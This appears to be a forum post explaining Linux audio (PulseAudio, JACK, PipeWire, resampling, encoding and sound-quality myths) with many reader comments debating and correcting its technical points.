PulseAudio isn't the only sound server/daemon available for Linux, though it is certainly the most popular and most likely the default of whatever distribution you are using. PulseAudio has become a bit of a standard for Linux sound and has by far the best compatibility with most applications, but that doesn't mean there aren't alternatives.

**[JACK](http://jackaudio.org/)** (JACK Audio Connection Kit, a recursive acronym like GNU) is a sound server focused primarily on low latency. If you are doing professional audio work on Linux, you will already be very familiar with JACK. JACK's development is very focused on low latency, real-time audio and is critical for such people.  JACK is available on most distros as an alternative, and you can try it for yourself if you so want; but you might find some applications do not work nicely with JACK.

**[PipeWire](https://pipewire.org/)** is a project that is currently in development, looking to solve key problems that exist in current sound servers. PipeWire isn't just a sound server but also handles the multiplexing of video sources (like a camera). Special attention has been put into working with sandboxed applications (like Flatpaks), which is an area where PulseAudio is lacking. PipeWire is a very promising project that might very well succeed PulseAudio in the future and you should expect to see appearing in distribution repositories very soon. You can try it yourself right now, though it isn't quite as easy to get started with as JACK is.

More audio servers exist, but are beyond the scope of this post.

What is resampling?
-------------------

Resampling is the process of turning a PCM stream into another PCM stream of a different resolution. Your DAC only accepts a limited range of PCM signals, and it is up to the software to make sure the PCM stream is compatible. There is almost no DAC out there that doesn't support 44.1kHz, 16-bit, 2-channel PCM, so this tends to be the default. When you play an audio source (like an OggVorbis file), the PCM stream might be 96kHz, 24-bit, 2-channel PCM.

To fix that, PulseAudio will use a **resampling algorithm**. There are two kinds of resampling methods: upsampling and downsampling. Upsamling is lossless, since you can always represent less data with more data. Downsampling is lossy by definition, you cannot represent 24-bit PCM with 16-bit PCM.

**MYTH: Downsampling is a loss in quality!** This is only true in a technical sense, or if you are downsampling to less than 48kHz, 16-bit PCM. When you downsample a 96kHz, 24-bit PCM stream to a 48kHz, 16-bit stream, no meaningful data is lost in the process; because the discarded data lies outside of the human ear's hearing range.

**FACT: Resampling is expensive.** Good quality resampling algorithms actually take a non-trivial amount of processing power. PulseAudio defaults to a resampling method with a good balance between CPU time used and quality. 

What is mixing?
---------------

Mixing is the process of taking two PCM streams and combining them into one. This is extremely complicated and not something we're going to discuss at length. It is not important to understand how this works, only to understand that it exists. Without mixing, you wouldn't be able to hear sounds from multiple sources. This is true not just for PulseAudio and computer sound, this is true for anything. In real life, you might use an A/V receiver to accept sound from your TV and music player at once, the receiver then mixes the signals and plays it through your speakers.

What is encoding?
-----------------

Finally we can talk a little about encoding. Encoding is the process of taking a PCM stream and writing it to a permanent format, two types exist. You have *lossy* encoding and *lossless* encoding. Lossy encoding removes data from the PCM stream to safe space. Usually the discarded data is useless to you, and will not make a difference in sound quality; examples of lossy encoding are *MP3*, *AAC* and *Ogg Vorbis*. *Lossless* encoding takes a PCM stream and encodes it in such a way that no data is lost, examples of lossless encodings are *FLAC*, *ALAC* and *WAV.*

Note that lossy and lossless do not mean compressed and uncompressed. A lossless format can be compressed and usually is, as uncompressed lossless encoding would be very large; it would just be the raw PCM stream. An example of lossless uncompressed audio is *WAV*.

A new element encodings bring is their *bit rate*, not to be confused with samplerate and bit depth. Bit rate has to do with how much data is stored in every second of audio. For a lossless, uncompressed PCM stream this is easy to calculate with the formula `bit rate = sample rate * bit depth * channels`, for 16-bit, 48kHz, 2 channel PCM this is 1,5 Mbit. To get the value in bytes, divide by 8, thus 192kB per second.

The bit rate of an encoder means how much the audio will be compressed. PCM compression is super complicated, but it generally involves discarding silence, cutting off frequencies you cannot hear, and so forth. Radio encoding has a bit rate of roughly 128 Kbps, while most CDs have a bit rate of 1360kbps.

Lastly, there is the concept of VBR and CBR. VBR stands for **V**ariable **B**it **R**ate, which CBR stands for **C**onstant Bit Rate. In a VBR encoding, the encoder aim for a target bit rate that you set, but it can deviate if it thinks it needs more or less. CBR will encode a constant bit rate, and will never deviate.

**MYTH: Lossless sounds better than lossy.** This is blatantly untrue, lossless audio formats were created for perservation and archival reasons. When you encode a lossy file from a lossless source, and you make sure that it's a 48kHz, 16-bit PCM encoding, you will not lose any important information. What is enough depends on the quality of the encoder. For OggVorbis, 192kbps is sufficient, for MP3, 256kbps should be preferred. 320kbps is excessive and the highest quality supported by MP3. In general, 256kbps does the trick, but with storage being abundant these days, you can play it safe and use 320kbps if it makes you feel better.

**MYTH: CBR is better than VBR.** There is no reason not to use VBR at all, there is no point in writing 256Kbps of data if there is only silence or a constant tone. Let your encoder do what it does best!

**FACT: Encoding a lossy format to another lossy format will result in a loss of data!** You will compress data that is already compressed, which is really bad. When encoding to a lossy format, always use a high quality recording in a lossless format as the source! 

**I DON'T BELIEVE YOU:** This article from the guys Xiph (the people who brought you FLAC and Ogg Vorbis) explain it better than I can: https://people.xiph.org/%7Exiphmont/demo/neil-young.html

TL;DR, I JUST WANT THE BEST SOUND QUALITY
=========================================

Here is a quick guide to achieving great sound quality on Linux with the above in mind.

 * When you want to encode audio, prefer open, free formats like Ogg Vorbis. MP3 is not your friend.
 * Never encode a lossy format to another lossy format. Always try to encode from a 96kHz, 24-bit FLAC if you can.
 * Generally you won't have to touch PulseAudio, but there are a few things you can change in the `/etc/pulse/daemon.conf` file.
   * You can pick a different resampling method, see the manual for your options.
   * You should probably match the `default-sample-*` settings to your sound card.
   * Generally you shouldn't touch this file unless you are experiencing sound issues.
   * Do not set `avoid-resampling` to `true`, this is a huge misconception, this does not improve sound quality at best, and in the worst case, can actually break things.

As you can see, there's little you can do in Linux in the first place, so what can you do if you want better sound?

 * Buy a good external DAC, turning a digital signal into analog inside of a PC case is a bad idea due to electromagnetic interference. Ever plugged your headphones into the front audio jack of your case? You will hear the noise. A good DAC will make a meaningful improvement your listening experience.
 * Your headphones and amplifier really make the biggest difference. Having a good pair of headphones paired with a good headphone amplifier ten times more important than whatever chip you got in your PC.

**MYTH: Linux sound quality is worse than Windows.** They are exactly the same, Pulse doesn't work that different from how Windows does mixing and resampling.

**MYTH: Linux sound quality can be better than Windows.** They are exactly the same. All improvements in quality come from the driver and your DAC, not the sound server. Pulse and ALSA do not touch the PCM beyond moving it around and resampling it.

I hope this (long) guide was of help to you, and helped to dispell some myths. Did I miss anything? Ask or let me know, and I'll answer the best I can. Did I make any factual errors? Please correct me with a source and I'll amend the post immediately.
While I agree you shouldn't use MP3 because Vorbis and Opus are better, all the patents on it expired two years ago. It's a free codec now.
24 bit-depth has a lower quantized noise floor than 16 bit-depth has.  For both bit-depths, it resides below human hearing.  But, if you sample audio, amplify it, resample, and so on, you risk amplifying the noise floor into the audible range.  This is much harder to do with 24 bit-depth, so, for this reason, it may be preferred in this situation.
Nice write up. You did not explain the division or dichotomy of pulse audio and Jack, and how ALSA ties into both. Not explaining jack in Linux audio is comparable to not explaining pulse audio, which you did a great job. That said, the Linux audio experience is incomplete without touching on the topic of jack audio, and the differences and similarities with pulse.  Alsa no longer needs pulse audio, it can now "multiplex" or mix as you say, the many audio sources, but in reality nobody seems interested to properly implemented that down deep in ALSA..... Both pulse and Jack could be "mixed" down deep in ALSA.
 
 
That said, we are working on a replacement for both in modern Linux audio, see pipewire for details. 
 
https://pipewire.org/
  

Once done we will have a single audio interface that supports the features of both jack and pulse, where jack is obviously the more advanced parts, and pulse is interface will be compatible as applications gradually embrace the new Linux audio future.
No mention of Opus which has the lowest "transparency threshold" at around 64-96kbps. One of the best if not the best developments in audio codecs in the past few years.
Great post but your section about bit depth is a bit lacking.

>This has to do with how binary works.

It has nothing to do with binary, you can have irrational numbers in binary. It has to do with giving something infinite a finite value (integer) on a finite scale (representable by 16b). You might've already heard the fancy word for that: Quantization.

The issue with that is of course that you can't represent 16.000001% amplitude (Volume in dB) on an integer scale from 0 to 65535, so you have to round.  
This obviously alters the audio, not by much but it does. These alterations manifest in sound waves that shouldn't be there aka. noise.  
Since this is caused by the quantization, it's called *quantization noise*.

If a sound is drowned by noise you obviously can't (properly) hear it, so the distance between the (effectively) quietest and loudest sound (Fancy word: Dynamic range) is shrunk by the amount of noise there is.   
With 16b, the dynamic range is 96dB and if you drown the quantization noise with more noise that is harder for us to perceive (Fancy word: Dithering) the dynamic range can be perceived as ~120dB.

You do not want 120dB on your ears, that is pretty close to the *upper limit of pain tolerance* for a human.   
96dB is lower than that of course but not particularly pleasant either.

At reasonable listening levels (which you should honor as much as possible, hearing damage is *irreversible*), you cannot hear the noise caused by quantizing to 16b.
> Upsamling is lossless, since you can always represent less data with more data.

Is it though? What if you are resampling between sample rates that are not an integer multiple of each other?  
For example 44.1kHz -> 48kHz.
I'm not much of an audio guy and didn't know how a lot of this worked. So thank you, this was a fun read.
One way to think about niche pulseaudio fills is that it's a windowing system (aka compositor) for audio. Just like a windowing system allows several graphic buffers to be seen on a single video output at once, a sound compositor allows several sound sources to be heard on a single output.  It's not a multiplexer however, in the sense most people understand multiplexing.

The idea of a sound compositor itself is perfectly fine, pretty much has to be done to allow multiple apps to produce sound at the same time. It's the implementation details in pulseaudio that draw most of the criticism.

ALSA means two mostly unrelated things, causing a lot of confusion. There's a kernel interface (a bunch of ioctl that work on devices in /dev/snd) which is called ALSA, and then there's a very extensive userspace library also called ALSA or sometimes alsalib. The kernel interface is fine. The library is not. It's not just a bunch of wrappers for the kernel interface, it does a lot of stuff including limited multiplexing and mixing which really, really shouldn't be done in a library. To make matters worse, it happens to be the default way to get the ioctl wrappers, so people who'd be rather talking to the kernel interfaces directly end up linking and depending on all that userspace stuff as well.

One question that I never managed to find a good answer to wrt audio in Linux, is what about hardware-assisted mixing? Pulseaudio to my best knowledge does it all on the CPU, that's the audio equivalent of software rendering. Just like with window compositing, audio mixing should benefit a lot from being offloaded to a dedicated DSP, and I'm pretty sure there were cards capable of doing that at least 20 years ago. The whole Windows/Linux argument becomes much less clear if say Window is capable of HW offloading on cards that support it while Linux doesn't do that.

(or to put it in other terms, where's the audio equivalent of Mesa3D?)
You mentioned "quality", but did not mention "latency" as well as "skips/stutters".  This does affect the user experience *considerably*.  I've found that on the same hardware one can have a lot of different experiences when using ALSA alone, Jack, or PA.
You did sort of miss that ALSA was developing audio mixing "out of the box" with no effort around the same time PulseAudio was being developed.

Also no mention of Jack, which provides a lot of audio options on Linux and can run alongside PulseAudio or replace it entirely.

"src-sinc-best-quality" doesn't exist in PulseAudio any more. "pulseaudio --dump-resample-methods" will list what resample methods you do have available.
I disagree. Audio can be audibly different in Linux and Windows on the same hardware. You may not hear the difference on your hardware, but users with different hardware can actually tell the difference.

Audio chips have different modes of operation. Linux and Windows drivers may activate different modes resulting in different quality.

Mixing and resampling can be performed with different parameters, resulting in different quality.

Because mixing and resampling affect quality, applications may want to feed PCM directly to DAC. In Linux you simply use ALSA "hw". In Windows you request direct access, but it may still go through mixing and resampling.
It seems that you kind of messed up kilobytes per second and kilobits per second in "What is Encoding?" part.

>For a lossless, uncompressed PCM stream this is easy to calculate with the formula bit rate = sample rate \* bit depth \* channels  
, for 16-bit, 48kHz, 2 channel PCM this is 1,5 Mbit. To get the value in bytes, divide by 8, thus 192kB per second.  
>  
>The bit rate of an encoder means how much the audio will be compressed. PCM compression is super complicated, but it generally involves discarding silence, cutting off frequencies you cannot hear, and so forth. Radio encoding has a bit rate of roughly 128 Kbps, while most CDs have a bit rate of 256Kbps.

Bitrate should be in bits, you don't need to divide it by 8 to get bytes. The usual 192Kbps or 256Kbps naming is in bits, not in bytes. Saying that CDs are 256Kbps is really misleading.

Also, I'm not sure that all of your "myths" are really myths.
Fact: Linux has better sound on my hardware.

Why? Because "sound" starts at the driver to the hardware. The drivers on Windows suck for my chipset.
> You can pick a different resampling method, see the manual for your options.

In case anybody's looking for the manual, here's what I've compiled from the `pulse-daemon.conf(5)` man page and from the [libsamplerate API documentation](http://www.mega-nerd.com/SRC/api_misc.html):


* The  method  `trivial`  is the most basic algorithm implemented. If you're tight on CPU consider using this. On the  other  hand it  has  the  worst  quality  of them all.
* The Speex resamplers take an integer quality setting in the range 0..10 (bad...good). They exist  in two flavours: `fixed` and `float`. The former uses fixed point numbers, the latter relies on floating point numbers. On most desktop CPUs the float point  resampler  is  a  lot faster, and it also offers slightly better quality.

    From the [speex documentation](https://www.speex.org/docs/manual/speex-manual/node7.html#SECTION00760000000000000000): Using a higher quality setting means less noise/aliasing, a higher complexity and a higher latency. Usually, a quality of 3 is acceptable for most desktop uses and quality 10 is mostly recommended for pro audio work. Quality 0 usually has a decent sound (certainly better than using linear interpolation resampling), but artifacts may be heard.

* The `soxr`-family methods are  based  on  `libsoxr`,  a  resampler library  from  the SoX sound processing utility. The `mq` variant has the best performance of the three. The `hq` is more expensive and,  according to  SoX developers, is considered the best choice for audio of up to 16 bits per sample. The `vhq` variant has more precision than `hq` and is more suitable for larger samples. The Soxr resamplers generally offer better quality at less CPU compared to other resamplers, such  as  speex.  The downside  is  that they can add a significant delay to the output (usually up to around 20 ms, in rare cases more).

* Algorithms provided by the `libsamplerate` library:
    * `src-sinc-best-quality` - This is a bandlimited interpolator derived from the mathematical sinc function and this is the highest quality sinc based converter, providing a worst case Signal-to-Noise Ratio (SNR) of 97 decibels (dB) at a bandwidth of 97%.
    * `src-sinc-medium-quality` - This is another bandlimited interpolator much like the previous one. It has an SNR of 97dB and a bandwidth of 90%. The speed of the conversion is much faster than the previous one.
    * `src-sinc-fastest` - This is the fastest bandlimited interpolator and has an SNR of 97dB and a bandwidth of 80%.
    * `src-zero-order-hold` - A Zero Order Hold converter (interpolated value is equal to the last value). The quality is poor but the conversion speed is blindlingly fast.
    * `src-linear` - A linear converter. Again the quality is poor, but the conversion speed is blindingly fast. 

See the output  of  `pulseaudio --dump-resample-methods`  for  a  complete  list  of  all available resamplers.  Defaults to `speex-float-1`.
I pretty much agree with everything you write and especially the conclusion ... sound quality is independent of OS, at least these days, when comparing Linux and Windows.

But your tone struck me as bit pedantic.

I do not really agree with your proposition that "lossless sounds better than lossy" is "blatantly untrue." Blatantly? Really? When comparing FLAC to MP3 I think the jury is still out on that. It might be true but various studies that I have read in recent years suggest that for certain kinds of music there is a small, detectable difference  between the two for some listeners. I don't have time to go back and find those studies or I would cite them. This is a hot-button topic over on r/headphones and gets debated, sometimes with lots of anger, on and off. It is not easy to test that hypothesis with blind samples (I have tried it myself using college students ... and ended up concluding that my tests were flawed). I think that is why the jury is still out.

I have frequently coded and stored WAV format in Python and although the sample rate is two to the power of 16 as you suggest, it is signed, so the range recorded is not between 0 and 65535 but -32767 and 32767 (which has no practical bearing on the argument).

And when we justify the 44.1 kHz standard for WAV format (or CDs), we don't have to end up saying that the human ear can hear up to 20 kHz. It is very unlikely that humans can hear anything past 15 kHz. So, why, given the Nyquist-Shannon sampling theorem, was the standard set at 44.1kHz? Because SONY, who set the standard, already had a lot of testing equipment and designs for  more testing equipment in their labs and on their books and the decision saved them a lot of money.

You do not necessarily need to buy an external DAC or amplifier. If you have a good motherboard with a decent Realtek audio chip, the solid state DAC on that chip is perfectly adequate for converting a digital file to an analog stream. The technology of DAC conversion is ancient and undemanding and, these days, trivial to code into solid state devices.

Analog out has to have adequate voltage to power your headphones, but again, a good motherboard will satisfy this requirement no matter what headphones you are using.

The quality of the headphones does, indeed, matter. That is really easy to demonstrate in a blind test. 

The core argument you make is correct. I'm just arguing minor points here.
The reason to use CBR over VBR is to ensure your audio can play on any device. Sure most devices will handle VBR audio fine but it's generally safer with CBR.
You forgot to mention that on debian (and probably most distributions too), by default, ALSA is configured to take multiple streams, even without pulseaudio or hardware capability.

So, with pure ALSA, you can have 2 instances of mpv playing, or whatever.

And this is the biggest opposition I have to pulseaudio proponents: they claim it solves a problem of ALSA that does not really exist.
Linux is still bad at Bluetooth audio. I couldn't make my headphones switch between A2DP and HSP profiles automatically, like it does on Mac. So I have to do it manually every time I need to answer Skype call which is a big pain.
[deleted]
You seem to know things. My question to you would be...latency.

A long time ago, I had a MIDI piano hooked up to my Linux machine, and it was awful. I remember running a pulseaudio command and finding my audio latency was at around 100ms. This works much like the ever popular speech jammer, only when you're trying to play piano. I feel like such a high latency would also be pretty bad in gaming scenarios too.

Has the latency situation improved with pulseaudio? or does it still just increase the latency over time? I had to restart pulseaudio to get my latency down every time I wanted to use the piano.
[deleted]
Two errors in your statements on the basics of digital audio.

1. Nyquist assumes that the Y-axis is continuous, not discrete, as is the case with PCM audio. Because of that, the bit depth you choose actually effects the maximum frequency you can reproduce at a given sample rate. 

2. Related to #1, 16 bits per sample cannot actually reproduce audio with the range of human hearing without noticeable artifacts, especially in quiet passages of music; to correct for this, better 16-bit productions use dithering, where white noise is actually added into the mix that removes the quantization errors. You're effectively replacing a kind of error that human ears are sensitive to with one that they're better at filtering out. In either case, this was sensible in the 1980s and 1990s when storage space was more expensive than it is nowadays. At 24 bits per sample, the need for dithering goes awayl.

There's no particular reason we should still be using dithered 16-bit audio over 24-bit audio other than format inertia; the statement that humans can't hear the difference is just silly.
I've been using a JACK-based DAW for years - it is rock solid and high quality.  Best latency of any of the DAW's in my studio, to boot.

Just remove PulseAudio, and use JACK and ALSA.  This just plain rocks.
This article started pretty fine for the Scientific Facts, but soon after it turns to what can mostly be described as a sandwich for PA apolgia.

"ALSA does not support mixing"

" If you have audio issues these days, it's usually a problem in ALSA or your driver."

Both things soundly (if you pardon the pun) untrue.

If you could fix those statements this could be a passable thing. Given that the scientific writeup is quite good, I'll consider this balanced out in the meantime and neither upvote or downote, but I will certainly be advising readers of this document about the exaggerations regarding blaming ALSA.
[deleted]
Would be really interesting to add how [JACK](http://jackaudio.org/) and [PIPEWIRE](https://pipewire.org/) fit in all of this.

&#x200B;

Excellent write up if I could I would upvote twice.
A guide to Audio on Linux for Professionals:

https://help.ubuntu.com/community/UbuntuStudio/AudioHandbook
> Buy a good external DAC, turning a digital signal into analog inside of a PC case is a bad idea due to electromagnetic interference.

Depends on the hardware. Laptops tend to have worse sound quality than desktops. Desktops and workstations are variable, which indeed has a lot to do with EMI inside the case. But plenty of workstations and desktop products fabulous sound quality. Users won't necessarily see any improvements by buying an external DAC, especially if they're not using a laptop.

> a good headphone amplifier

Low-impedance headphones don't need any additional amplification.
> MP3 is not your friend.

All of the mp3 patents have expired, and it is _now_ thus as free as Vorbis or Opus, even if it didn't use to be that way.
Superb! Clears up relation between Alsa and PulseAudio for me - thanks a lot :)
Saved for later. Thanks!
Thank you for this informative post!
This question may be out-of-scope for this post, but (as a different commenter said) you seem to know things and maybe you can help.

One thing I miss on Linux that my friends using Windows have is the ability to redirect output to input using a (3rd party) program called [Virtual Audio Cable](https://en.wikipedia.org/wiki/Virtual_Audio_Cable).

I've never found anything like it on Linux, other than JACK + Cadence (but that doesn't work for anything that requires Pulseaudio, which is a lot of modern software) or fiddling with Pulseaudio sinks, but in my experience it's quite tedious when you want to do anything complicated.

Any tips?
Really enjoyed reading this! Thanks for taking the time to write it. Feel like I've learned a lot  :)
On pulse being solid these days...I still have to reset it occasionally when the sound randomly turns into a garbled mess.  Other than that it's fine I guess.

Great article though, I learned some things and will be passing it on to an audiophile friend of mine.
On a related note:  I found a workaround for Bluetooth audio skipping on my rpi3 running buster .   

This release Has issues with the built-in Bluetooth stuttering and skipping when using the built-in Bluetooth audio. Others have reported the same thing. There is some evidence that it has something to do with onboard Wi-Fi and onboard Bluetooth operating simultaneously. The purpose of this message is not to debate that problem, But the document this work around.

I happened to have a separate Bluetooth v4 USB dongle. Plugging that in to the same rpi, and disabling the onboard Bluetooth, solved the problem. Onboard Wi-Fi is still being used, but Bluetooth runs over the USB interface to a plug-in dongle. Audio now sounds great.  Bluetooth dongles are very inexpensive from Amazon or eBay.
>Do not set avoid-resampling to true, this is a huge misconception, this does not improve sound quality at best, and in the worst case, can actually break things.

What can this break? I use it so my DAC will always be running at whatever the sample rate of my media is. No reason to waste cpu cycles if I don't have to.
[deleted]
Some useful information but the author should refrain from presenting opinion as fact.   He sounds like the blurb sheet from the original Sony CD player...Perfect Sound Forever.  It may be perfect for delivering 14-bit sound to 12-bit ears.
In resampling you mentioned that

>Downsampling is lossy by definition, you cannot represent 24-bit PCM with 16-bit PCM

Isn't downsampling more related to x axis than to y axis
[deleted]
Wow! Thank you for this thorough write-up!  I've always found audio formats and whatnot a bit confusing.  This was a great read!  

Now I'm gonna go impress my friends with my new knowledge lol
[deleted]
Very good summary, thank you. I can verify most of this, apart from the Linux part and how it gets handled there, which is what i wanted to know about.
I wish I could give this more upvotes.
Thanks for the post. Some of this I was aware of(science of sound, lossy vs lossless) and some(ALSA/PulseAudio) I had no idea.

Brain-dumps are a good thing. We need more of these on this sub.

:)
Thank you for writing this up. Two things I'd like to know how they fit in: oss (relevant for old Loki native games; osspd seems to be the modern replacement for libpulsedsp LD_PRELOAD) and bluez (which appears to be the hardware management of alsa but for Bluetooth).
I remember PulseAudio getting into a severely broken state when my laptop hit swap for a while, and becoming unable to play audio that was not horrible and stuttering. I don't know if that ever stopped, actually, so much as I just started using SSDs and my system stopped dying under swap.

From reading this thread, I think it's mostly that Pulse changed the set of users for whom audio was broken. So some people who had broken and weird audio before now had working audio, and those people like Pulse. Then some people like me had sound cards with working mixing before, and bad experiences with Pulse, and to those it looks like Pulse broke sound for no good reason.
Your Nyquist-Shannon wikipedia link is busted. It's got a '\]' on the end of it.
Nice, a good article about the basics of audio in Linux!

I've been playing with JACK lately: it can be frustrating to setup (I should probably have used a distro like Ubuntu Studio!), but once you understand how it works it can be a really powerful and useful tool.

The ability to connect two different pieces of software that were never made to talk to each other is especially amazing. For example, you can make Hydrogen output audio channels to Ardour and let Ardour control Hydrogen playback at the same time.

Recent versions even let Pulseaudio release the ALSA device while JACK is starting up. I used to get a lot of issues with that feature, but nowadays it pretty much works out of the box.
Lately I've been hearing a high-pitched ringing in my ears whenever there is silence. Sometimes I hear a faint, lower, ring and it disappears quickly. (Which is weird considering I always put the volume of my phone halfway or lower when using headphones, but I assume it must have something to do with everyday city sounds such as loud trains at the subway.)

I can hear up to 18440 Hz from that tone generator website. Does that mean I lost the ability to hear between 18440 Hz and 20000 Hz?
I would be looking not just for Audio Production but Music Composition.

My sister use Score Notation software on Windows. She uses Encore. She said that Musecore is not very friendly, and I was trying to know alternatives. I don't know if Tux Guitar allows synthetized human voices, she is part of a choir and a software that can be played by it's PDF, the music score sheet of course. Do you know more related software for Linux? Thanks.
this is pretty much what I would have needed when I first started using Linux and was struggling with making audio work
> PipeWire is a project that is currently in development, looking to solve key problems that exist in current sound servers. PipeWire isn't just a sound server but also handles the multiplexing of video sources (like a camera). Special attention has been put into working with sandboxed applications (like Flatpaks), which is an area where PulseAudio is lacking. 

This sounds very DirectX-like / Microsoft-like over-engineered and over-aiming project. Why do we need a tool / library / server that mixes both audio and video for getting a simple feature as having sound for Flatpaks through a secure channel. Put that functionality to the PulseAudio or even better create a library / server independent D-Bus API. If PulseAudio is conceptually bad and you're going to rewrite it, why not start from simple? PulseAudio cannot still work for multiple users and cannot run as a system daemon why not fix that first? I really cannot bring myself to like the development and GNOME's decision to use such implementations also affect KDE and other desktops since they want to avoid rewriting stuff (because of lack of manpower) and use whatever GNOME uses nowadays.

Edit: Wonder what a really good sound server / user-space driver looks like? Check out [sndio](http://www.sndio.org/) used by BSDs. A Linux port exists too!
I'm sure this will be buried by a sea of comments. I just wanted to say that I am Linux systems administrator that never deals with audio beyond getting it to work on my laptop. This write up was great and I really appreciate it. I will be monitoring the comments for further insight.
Why do I hear crackling over my Bluetooth headphones when I play any audio? I have a pretty new laptop with up to date Fedora and $80 skullcandy headphones. Is there signal interference? Is it the bluetooth driver? I have tried muting various channels and restarting pulseaudio, and et cetera and have very reliable crackling. And none with other types of headphones.
Thank you for taking the time to write this! That was very interesting and insightful!
So if I have 2 channels of audio is it going to be 192kbps x 2 because two channels of audio, and then more for each additional channel?
Fantastic post. Similar to my HomePod thread reply where I stated that the lossless 16/44.1 signal sent by airplay was absolutely appropriate for listening to high def audio. I have my lossless copies of studio masters for archiving and I use a two step process to encode them to lossy for streaming/listening.

A lot of the early problems were distributions improperly configuring pulseaudio.
In my personal experience, I really don't hear a difference between sound on Windows and Linux. My only problem, is that just unfortunately, pulse audio just gets a little overwhelmed on my hardware. But my motherboard doesn't have the best Linux support--oh well. In the future, now that I use Linux,  I will totally get a motherboard that is for sure Linux compatible. And the longer I use Linux at a time, the more seldom that I get that static issue with the sound being all wonky. And you know what's funny? When I went into windows and manually increased the sound output settings to "studio quality," Windows now does the exact same thing almost as often--perhaps equal or me. So all that tells me is that by default PulseAudio has its settings at least better than windows out-of-the-box.

&#x200B;

Edit: so for me, if 99% of what I do is faster on Linux, I don't mind if the audio messes up everynowandthen. I mean, really, maybe once or twice everyother day, PulseAudio will get static-y. Usually if it happens, it happens all at once and then smooths out.
> ENTERS DTS

> ENTERS EXTERNAL DAC

> ENTERS BLURAY PLAYBACK OVER HDMI WITH DTS PASSTHROUGH
Post like this is what makes reddit good.  Kudos
Hi. Maybe you could help me with sound on Linux :D I have Asus G74Sx. On Windows sound on build-in speakers is loud and clear. On Arch Linux (Ubuntu also) the sound is clear up to 50% of max volume (which is much quieter than 50% on Windows). Above that threshold there is much noise. I don't know how to describe it - speakers sounds as if they were to explode.
Where can I start debugging my problem?
I've been meaning to debug this for ages but haven't got around to it you. Maybe you might have an idea where I can start looking.

If I'm listening to music with my headphones and then launch pavucontrol or gnome-control-center then the sound becomes somehow 'less'. It's almost like doing so changes some equalization profile somewhere in a way that turns down the bass. This happens as soon as the programs are launched, I don't adjust anything, and further fiddling is unable to turn the bass back up. All I can do is close them, and wait for 'a while' (maybe a couple of minutes) after which the bass turns itself back up.

Like, where do I even start trying to figure that one out!
Thank you so much for putting this together. I've started recording a demo album and Linux audio inputs and outputs are so confusing, but I refuse to give up and use a Windows machine for it. Going to read through this today and try to get everything straightened out!
Very good!
Two things:

1) I thought mp3 was [no longer patented](https://www.theregister.co.uk/2017/05/16/mp3_dies_nobody_noticed/) so not something that needs to be actively avoided.

2) This does very little to explain how/why on many of my own laptops for example, the sound is complete doo-doo compared to Windows. THAT'S the key place where people are "deceived" in my experience. Maybe spend a bit more touching on that? Using good headphones and amp on a crappy source is still going to sound crappy, no?

&#x200B;

Great post!
Excellent write-up!
Does anyone have input on what audio chip to look for when buying a motherboard? In terms of complete driver support and sound quality.
Maybe people think that audio is better on Windows because of Software. When my parents bought me my Ideapad 320 i3-6100u it came with dolby audio pre-installed. You could apply some corrections like Surround and volume leveler, default the equalizer to Music, Voice, Movies or Games... Volume leveler is a big deal because it made the speakers sound really loud. 100% sound on linux was like 40% with dolby and volume leveler enabled, thus 100% with dolby was really surprisingly loud (probably worse in quality but laptop speakers you don't care, loudness is the real issue you worry about).
When I upgraded to the latest Debian, one of my audio devices outputs a low humming noise when nothing is playing audio. If I play something that is silent or very quiet, it goes away. When I pause, the humming returns after 4 seconds. I also noticed some feedback when I turn on a lightswitch. I checked all my physical audio connections which are still good. What's up with that?
Add this whole thing to the arch wiki. That way it might be seen by someone again and not be lost.
[deleted]
> MYTH BUST: Humans cannot hear beyond 20 kHz, period. Anyone who claims to be able to is either supernatural or lying to you

This is kind of bugging me. Okay, it's probably true for adults, but young children can often hear beyond 20kHz, see: Takeda et al., 1992, *Age variation in the upper limit of hearing*. [can view pdf for free here](https://www.academia.edu/24539711/Age_variation_in_the_upper_limit_of_hearing)

It's a bit hard to find actual empirical data on human hearing beyond 20kHz. But I'd encourage anyone with very young kids to try generating some tones in audacity between 20-22kHz and see if they can hear them. I could still hear 21kHz tones as a 10 year old. As a 24 year old my limit is 17kHz.
I might modify the myth, "Lossless sounds better than lossy," to something more like, "Lossless always sounds better than lossy," or something like that since lossy at an inadequate bitrate will sound worse, as explained in the text following the statement of the myth.
Ive only skimmed this article and not even to the Linux specific part (but was curious to see if you would go back and explain the no longer in fashion OSS)...but wow this is really good and helpful. I finally know what Sample Rate is for.  mega good work for this.
This is a post of the highest quality. Thank you for sharing. It shall be linked to for years to come I'm sure.  Whenever I see "Clapton is God" scrawled on a bathroom wall I will cross out "Clapton" and replace with OP's handle.
A little late to this conversation but does anyone know if VOIP would benefit from using JACK? I've always thought of Jack as for music production but perhaps the low-latency would improve voice/video chat experience.
Thanks for this awesome guide!

> Your headphones and amplifier really make the biggest difference. Having a good pair of headphones paired with a good headphone amplifier ten times more important than whatever chip you got in your PC.

I would really appreciate if you could explain this in more detail in another guide. I understand nothing about headphones and speakers and price differences are huge.
No, it was an error on my behalf, I wrote that late at night. The post has the correct bitrate.
>**MYTH: CBR is better than VBR.**  There is no reason not to use VBR at all, there is no point in writing  256Kbps of data if there is only silence or a constant tone. Let your  encoder do what it does best!

If i understood everything correctly shouldn't that be:

>There is no reason not to use CBR at all

As the VBR is leaving it up to the encoder to select the better bitrate and CBR the one that encodes 256kbps even over silence/constant tones?
Yes
>MYTH: Lossless sounds better than lossy. This is blatantly untrue, lossless audio formats were created for perservation and archival reasons. When you encode a lossy file from a lossless source, and you make sure that it's a 48kHz, 16-bit PCM encoding, you will not lose any important information. What is enough depends on the quality of the encoder. For OggVorbis, 192kbps is sufficient, for MP3, 256kbps should be preferred. 320kbps is excessive and the highest quality supported by MP3. In general, 256kbps does the trick, but with storage being abundant these days, you can play it safe and use 320kbps if it makes you feel better.

I can blindly tell the difference between FLAC and properly encoded Opus (Vastly superior to MP3 and noticeably better than Vorbis) on my setup. What you write is true for most speakers and most sound chips, but the further down the rabbit hole you go, it becomes clear that some of that "unimportant information" still makes a huge difference to the overall sound of the track. So I'm sorry, but this isn't a myth.

It's just that I chanced into some proper studio monitors that cost me nothing from a former DJ, which I don't exactly expect most people to have... But that also doesn't mean that there is no difference even if you need pretty damn good hardware to run it.
Did you mean there is no reason to use CBR? The sentence seems to imply the encoder would know best and therefore there would be no reason to use constant bit rate.
Thanks for the write-up and research made and shared. I've shared it with [https://linuxmusicians.com/viewtopic.php?p=109958](https://linuxmusicians.com/viewtopic.php?p=109958) where we took another round with the formats and lessons learned along the way. Missed your crosspost to r/linuxaudio but hope you don't mind the spread :)

br
